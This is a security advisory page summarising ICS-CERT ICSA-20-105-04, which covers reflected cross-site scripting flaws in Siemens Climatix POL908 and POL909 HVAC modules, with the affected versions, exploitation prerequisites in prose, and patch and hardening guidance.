Siemens Climatix (Update A)

Monitor6.1ICS-CERT ICSA-20-105-04Apr 14, 2020

Attack VectorNetwork

Auth RequiredNone

ComplexityLow

User InteractionRequired

Summary

Siemens Climatix POL908 (BACnet/IP module) and POL909 (AWM module) are vulnerable to reflected cross-site scripting (XSS) attacks through the web interface. The vulnerabilities (CWE-79 reflected XSS and CWE-80 improper neutralization) allow an attacker to inject malicious scripts that execute in a user's browser, potentially compromising session tokens, credentials, or triggering unauthorized configuration changes. The web interface is enabled by default in some configurations and lacks authentication controls by default.

What this means

What could happen

An attacker who tricks a user into clicking a malicious link or visiting a compromised website could inject malicious scripts into the Climatix web interface, potentially stealing session data, modifying device configuration, or redirecting users to phishing sites.

Who's at risk

Building automation system operators and facility managers who use Siemens Climatix climate control modules (POL908 and POL909) for HVAC management and building integration. Risk is highest for installations with the web interface enabled for remote or on-site monitoring.

How it could be exploited

An attacker crafts a malicious URL or embeds it in a phishing email targeting staff who access the Climatix POL908 or POL909 web interface. When a user clicks the link, reflected XSS (cross-site scripting) code executes in their browser, allowing the attacker to capture credentials, hijack the session, or alter device settings through the web UI.

Prerequisites

User must access the Climatix web interface via a web browser
Web interface must be enabled on POL908 or POL909
User must click a malicious link or visit a crafted URL
No authentication is enforced on the web interface (default configuration)

remotely exploitablelow complexityuser interaction required (phishing/social engineering)no authentication required by defaultreflected XSS vulnerability

Exploitability

Low exploit probability (EPSS 0.4%)

Affected products (2)

1 with fix1 EOL

ProductAffected VersionsFix Status

Climatix POL908 (BACnet/IP module): All versionsAll versionsNo fix (EOL)

Climatix POL909 (AWM module): All<V11.3211.32

Remediation & Mitigation

0/9

Do now

0/4

WORKAROUNDIf the web interface must remain enabled, enforce authentication and change the default ADMIN password

WORKAROUNDDisable JavaScript in web browsers used to access the Climatix web interface

WORKAROUNDUse a modern web browser with integrated XSS filtering

WORKAROUNDDisable access to default webpages on POL909 and use only custom web applications

Schedule — requires maintenance window

0/2

Patching may require device reboot — plan for process interruption

Climatix POL909 (AWM module): All

HOTFIXUpdate Climatix POL909 (AWM module) to version 11.32 or later

All products

HOTFIXUpdate Climatix POL908 to version 11.22 or later to disable the web interface by default

Mitigations - no patch available

0/3

Climatix POL908 (BACnet/IP module): All versions has reached End of Life. The vendor will not release a patch. Apply the following compensating controls:

HARDENINGIsolate Climatix devices behind a firewall and restrict network access to the web interface

HARDENINGEnsure Climatix devices are not accessible from the Internet or business networks

HARDENINGConsider removing POL908 and using the integrated BACnet/IP capability in newer Climatix 600 controllers instead

CVEs (2)

CVE-2020-7574 CVE-2020-7575

View full CISA ICS-CERT advisory

↑↓ Navigate · Esc Close

API: /api/v1/advisories/c233d772-3d0a-40b0-8b2e-24852e1d763f